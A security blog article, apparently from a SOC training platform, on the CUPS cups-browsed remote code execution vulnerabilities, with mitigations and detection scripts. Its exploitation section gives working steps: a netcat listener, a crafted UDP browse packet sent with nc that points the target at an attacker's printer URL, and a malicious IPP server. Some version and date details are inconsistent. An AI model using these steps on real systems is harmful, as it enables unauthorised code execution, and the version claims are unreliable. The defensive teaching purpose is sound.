CUPS, an open-source printing system, is vulnerable to multiple unauthenticated remote code execution vulnerabilities tracked as CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177.
This report focuses on the critical vulnerabilities in CUPS (Common Unix Printing System) identified as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177. These vulnerabilities allow for remote code execution (RCE) and the injection of malicious code through the manipulation of Internet Printing Protocol (IPP) data. These flaws are found in key components of the CUPS system, affecting Unix-like operating systems such as Linux and macOS. Immediate patching and security mitigation strategies are essential to prevent exploitation.
The Common Unix Printing System (CUPS) is an essential printing framework widely utilized in Unix-like operating systems, including various distributions of Linux and macOS. By implementing the Internet Printing Protocol (IPP), CUPS facilitates seamless printing services over local and networked environments, allowing users to manage and deploy printers efficiently.
In October 2024, security researchers revealed four critical vulnerabilities—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—that significantly threaten the integrity of systems running CUPS. These vulnerabilities primarily affect key libraries and services such as libcupsfilters, libppd, and the cups-browsed service. The risks associated with these flaws are intensified by the fact that they allow attackers to remotely execute arbitrary code without requiring authentication, thus posing a severe threat to the confidentiality, integrity, and availability of the affected systems.
The impact of these vulnerabilities is significant, as many organizations rely on CUPS for their printing infrastructure. Reports indicate that thousands of CUPS installations are publicly accessible, increasing the risk of exploitation.
By understanding the nature of these vulnerabilities and proactively addressing them, organizations can enhance their security posture and protect their systems from potential malicious attacks. This blog article aims to provide valuable insights into these vulnerabilities, enabling organizations to take the necessary steps to safeguard their infrastructure.
The vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 are categorized as critical, with CVSS scores indicating their potential impact on affected systems.
Versions Affected:
The vulnerabilities impact several versions of CUPS, particularly those released before the patches were applied. Notably, CUPS versions prior to 2.0.1 are vulnerable to these exploits. Users and administrators are strongly advised to check their installations against the following affected versions:
Most Linux distributions, including Ubuntu, Debian, Fedora, and others that use CUPS, are affected.
The exploitation of CUPS vulnerabilities CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 has been documented in the wild, with researchers and security analysts reporting limited but significant cases of active exploitation. These vulnerabilities allow attackers to remotely exploit the CUPS print service infrastructure, often leading to full system compromise due to the privileged nature of the CUPS daemon.
To protect against the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, CVE-2024-47177):
Apply Security Patches: Update CUPS and related libraries to their latest versions using your system’s package manager.
sudo apt update && sudo apt upgrade
sudo systemctl restart cups.service
Regularly check for updates as new security fixes are released.
Disable the cups-browsed Service:
sudo systemctl stop cups-browsed
sudo systemctl disable cups-browsed
This ensures the service is not running and cannot be exploited.
Block Access to UDP Port 631:
sudo ufw deny proto udp from any to any port 631
Firewall rules can be used to prevent access to the vulnerable services.
These actions will reduce exposure to the vulnerabilities while patches are being rolled out.
The core of the vulnerability involves exploiting CUPS by tricking it into generating a malicious PostScript Printer Description (PPD) file. This file contains attacker-controlled commands. When a print job is sent to the compromised printer, the command is executed with the privileges of the "lp" user (which is the user under which CUPS runs). While this user typically does not have elevated privileges, this method can be an entry point for further attacks.
There are two primary methods to generate the malicious PPD file:
Local Network via mDNS: An attacker can use multicast DNS (mDNS) to automatically register a new printer or replace the PPD file of an existing printer. This requires the attacker to generate multicast datagrams and deliver them to the cups-browsed daemon on port 631. While multicast traffic doesn’t travel across the Internet, local network attacks are still significant, especially in unprotected environments.
Any Network via Legacy UDP Protocol: The attacker can also exploit a legacy UDP-based protocol to register a new printer with a malicious PPD file from any network, including over the Internet. This involves sending a crafted UDP datagram to port 631, which is processed by the cups-browsed service. Proper firewall configurations or a NAT router can mitigate this attack by blocking access to port 631.
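Both delivery paths end the same way: cups-browsed writes a PPD for the advertised printer, and the commands embedded in it run when a job is filtered. A defender can therefore inspect the PPDs that cupsd has stored. The script below is an added example written for this article, not code from the article or from the CUPS project. It scans PPD text for the *FoomaticRIPCommandLine directive (the value foomatic-rip executes as a shell command line) and flags shell metacharacters in its value; the sample PPD, the /tmp path inside it and the default scan directory are constructed for illustration.

```python
import re
from pathlib import Path

# Constructed sample PPD for illustration (not from a real printer or exploit):
# a plausible header followed by a command-carrying directive of the kind the
# article describes.
SAMPLE_PPD = """*PPD-Adobe: "4.3"
*FormatVersion: "4.3"
*ModelName: "LetsDefend Printer"
*cupsFilter2: "application/vnd.cups-pdf application/pdf 0 foomatic-rip"
*FoomaticRIPCommandLine: "id > /tmp/ppd-test"
*DefaultPageSize: Letter
"""

# Directives whose quoted value is passed to a filter that runs it as a
# command line. A PPD generated from a network announcement has no business
# carrying one of these.
COMMAND_DIRECTIVES = {"FoomaticRIPCommandLine"}

# *Key: "value"  (keywords may contain '-' and '_'; values are double-quoted)
DIRECTIVE_RE = re.compile(r'^\*(?P<key>[A-Za-z0-9_-]+):\s*"(?P<value>.*)"\s*$')
# Characters that turn a "command line" into a pipeline, redirection or
# sub-shell; their presence raises the severity of a finding.
SHELL_META = re.compile(r"[;&|`$<>]")


def scan_ppd(text):
    """Return a list of (line_no, directive, value, reason) findings for one PPD."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = DIRECTIVE_RE.match(line)
        if not match:
            continue  # comments, unquoted keywords, blank lines
        key, value = match.group("key"), match.group("value")
        if key not in COMMAND_DIRECTIVES:
            continue
        reason = "command-executing directive present"
        if SHELL_META.search(value):
            reason += "; shell metacharacters in value"
        findings.append((line_no, key, value, reason))
    return findings


def scan_directory(directory="/etc/cups/ppd"):
    """Scan every *.ppd under the directory cupsd keeps its queue PPDs in.

    Returns {file_path: findings} for files that produced at least one finding.
    """
    results = {}
    for ppd_path in sorted(Path(directory).glob("*.ppd")):
        findings = scan_ppd(ppd_path.read_text(errors="replace"))
        if findings:
            results[str(ppd_path)] = findings
    return results


if __name__ == "__main__":
    # Run against the constructed sample, then against the live PPD directory.
    for line_no, key, value, reason in scan_ppd(SAMPLE_PPD):
        print(f"sample.ppd:{line_no}: *{key}: {value!r} -> {reason}")
    for path, findings in scan_directory().items():
        for line_no, key, value, reason in findings:
            print(f"{path}:{line_no}: *{key}: {value!r} -> {reason}")
```

Run it on a host after disabling cups-browsed to confirm that no queue it created is still carrying a command line; a hit on a queue you did not configure by hand is a strong signal that an announcement was accepted from the network.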
Exploiting the vulnerabilities tracked as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves tricking the CUPS system into processing malicious IPP (Internet Printing Protocol) attributes that lead to arbitrary code execution. Here's a closer look at how these vulnerabilities can be exploited:
To determine if a target CUPS instance is vulnerable, an attacker can set up a Netcat listener on their own machine. This can be done with the following command:
netcat -nvlp 4444
This command opens a listener on port 4444, waiting for any incoming connections.
Once the listener is set up, the attacker can send a specially crafted payload to the target CUPS instance's UDP service, typically operating on port 631. This is achieved using the following command:
echo '0 3 http://<attacker-ip>:<port>/printers/LetsDefend' | nc -nu <target-ip> 631
In this command, replace <attacker-ip> with the attacker's IP address and <target-ip> with the target's IP address. The command sends a UDP packet that attempts to exploit the vulnerabilities in the CUPS service.
If the target is vulnerable, executing the initial command will trigger a callback to the attacker's listener, allowing them to capture any data sent back from the target system. This response can potentially contain sensitive information or confirmation of successful exploitation.
To exploit the CUPS vulnerabilities (CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177), you will need to set up an IPP (Internet Printing Protocol) server. You can use the ipp-server project available on GitHub. Follow these steps to get it running:
Clone the Repository: Open your terminal and run:
git clone https://github.com/h2g2bob/ipp-server.git
Run the Server: After cloning, start the IPP server using the default configuration, which is usually adequate for testing:
python -m ippserver --port 1234 save /tmp/
Once the IPP server is running, the exploitation involves running a custom Python script that leverages the malicious behavior of the server. This script is designed to interact with the CUPS service and exploit the vulnerabilities identified.
You can modify the Python script as you wish.
By opening localhost:631 on the victim machine, you can see that the newly set-up printer has been added to the "Printers" section.
Once the user attempts to print using the malicious printer set up by the exploit, the malicious code embedded in the printer's attributes will execute on the target system. This happens because the printer attributes include commands defined in the exploit, which are processed by the target CUPS service when a print job is initiated.
Detecting exploitation of CUPS vulnerabilities such as CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177 involves a combination of log analysis, system behavior monitoring, and traffic inspection. Below are key strategies for detection:
The first line of defense is to inspect the CUPS log files (/var/log/cups/access_log, /var/log/cups/error_log) for any unusual activity.
Set up network traffic monitoring tools to capture any suspicious UDP or mDNS traffic targeting port 631 (the port used by CUPS). Detecting unexpected or malicious datagrams, particularly from unfamiliar devices or networks, can help identify an attack.
Since exploitation may allow execution of commands as the lp user, review activity by this user. Check for any unusual commands or file changes initiated by the lp user, especially outside of normal printing processes.
By regularly analyzing logs and monitoring network traffic, you can effectively detect attempts to exploit CUPS vulnerabilities and take action before serious damage occurs.
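The two detection sources above (the legacy UDP announcements on port 631 described in the exploitation overview, and the cupsd access_log) can be screened with a small amount of code. The script below is an added example for this article, not code from the article, LetsDefend or the CUPS project. It parses announcement payloads of the form shown earlier (`type state uri ...`) and flags printers advertised from outside a trusted network or under an unknown queue name, and it parses CUPS access_log lines (the common-log format cupsd writes, with the IPP operation and status appended) to flag queue add/modify operations and print jobs sent to an unknown queue. The datagrams, log lines, trusted network and queue allowlist are all constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Constructed samples, not captured traffic or real logs.
SAMPLE_DATAGRAMS = [
    b"0 3 http://203.0.113.10:1234/printers/LetsDefend\n",  # advertised from a public address
    b"0 3 ipp://10.0.5.20:631/printers/Office_HP\n",         # in-house print server
    b"not a browse packet",                                   # junk on UDP 631
]

SAMPLE_ACCESS_LOG = """\
localhost - root [26/Sep/2024:14:02:11 +0000] "POST /admin/ HTTP/1.1" 200 1182 CUPS-Add-Modify-Printer successful-ok
localhost - alice [26/Sep/2024:14:05:40 +0000] "POST /printers/LetsDefend HTTP/1.1" 200 2048 Print-Job successful-ok
localhost - alice [26/Sep/2024:14:06:02 +0000] "POST /printers/Office_HP HTTP/1.1" 200 2048 Print-Job successful-ok
192.0.2.55 - - [26/Sep/2024:14:07:00 +0000] "POST / HTTP/1.1" 200 317 CUPS-Get-Printers successful-ok
"""

# Assumed site policy: legitimate print servers live only in these networks,
# and these are the queues cupsd is expected to know about.
TRUSTED_NETS = [ipaddress.ip_network("10.0.5.0/24")]
KNOWN_QUEUES = {"Office_HP"}

HEX_FIELD = re.compile(r"[0-9A-Fa-f]+")

# host group user [date] "method resource protocol" status bytes [op ipp-status]
ACCESS_RE = re.compile(
    r'^(?P<host>\S+) (?P<group>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<resource>\S+) [^"]+" (?P<status>\d+) (?P<bytes>\d+)'
    r"(?: (?P<op>\S+) (?P<ipp_status>\S+))?$"
)


def check_browse_datagram(payload, trusted_nets=TRUSTED_NETS, known_queues=KNOWN_QUEUES):
    """Inspect one legacy browse announcement ('type state uri ...').

    Returns a reason string if the announcement deserves attention, else None.
    """
    fields = payload.decode("ascii", errors="replace").split()
    if len(fields) < 3 or not (HEX_FIELD.fullmatch(fields[0]) and fields[1].isdigit()):
        return "malformed browse packet"
    uri = urlsplit(fields[2])
    if uri.scheme not in ("ipp", "ipps", "http", "https"):
        return f"unexpected scheme {uri.scheme!r}"
    try:
        addr = ipaddress.ip_address(uri.hostname or "")
    except ValueError:
        # A hostname rather than an address: cannot be checked against the
        # trusted networks without a lookup, so surface it for review.
        return f"announcement uses hostname {uri.hostname!r}"
    if not any(addr in net for net in trusted_nets):
        return f"printer advertised from untrusted host {addr}"
    queue = uri.path.rsplit("/", 1)[-1]
    if queue not in known_queues:
        return f"unknown queue {queue!r} advertised"
    return None


def check_access_log(text, known_queues=KNOWN_QUEUES):
    """Return (line_no, reason) pairs for access_log entries worth a SOC look.

    cupsd records queue add/modify operations and job submissions at its
    default AccessLogLevel, so both events below appear without extra tuning.
    """
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = ACCESS_RE.match(line)
        if not match:
            continue
        op, resource = match.group("op"), match.group("resource")
        if op in ("CUPS-Add-Modify-Printer", "CUPS-Add-Modify-Class"):
            who = f"{match.group('user')}@{match.group('host')}"
            findings.append((line_no, f"{op} by {who}: a queue was created or changed"))
        elif op == "Print-Job" and resource.startswith("/printers/"):
            queue = resource[len("/printers/"):]
            if queue not in known_queues:
                findings.append((line_no, f"Print-Job to unknown queue {queue!r}"))
    return findings


if __name__ == "__main__":
    for index, payload in enumerate(SAMPLE_DATAGRAMS):
        reason = check_browse_datagram(payload)
        print(f"datagram {index}: {reason or 'ok'}")
    for line_no, reason in check_access_log(SAMPLE_ACCESS_LOG):
        print(f"access_log line {line_no}: {reason}")
```

The announcement check is meant to run on payloads collected by a capture tool or a listener on the segment, and the log check on the rotated access_log files; in both cases the queue allowlist is what turns a noisy stream into a short review list, so keep it in sync with the queues you actually provision.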
On the LetsDefend platform, you can practice by analyzing the latest zero-days in a realistic SOC environment. You can investigate EventID:307 - SOC329 - CUPS RCE Detection via IPP Injection (CVE-2024-47177) and learn how attackers exploit vulnerabilities to gain unauthorized access and execute malicious code.
The vulnerabilities in CUPS—CVE-2024-47076, CVE-2024-47175, CVE-2024-47176, and CVE-2024-47177—pose a critical security threat to Unix-based systems. Attackers can exploit these flaws to gain remote access, control print jobs, and inject malicious code into affected systems. With many servers publicly exposed via the IPP protocol, the attack surface is broad, requiring organizations to act swiftly by updating vulnerable CUPS versions and tightening network security.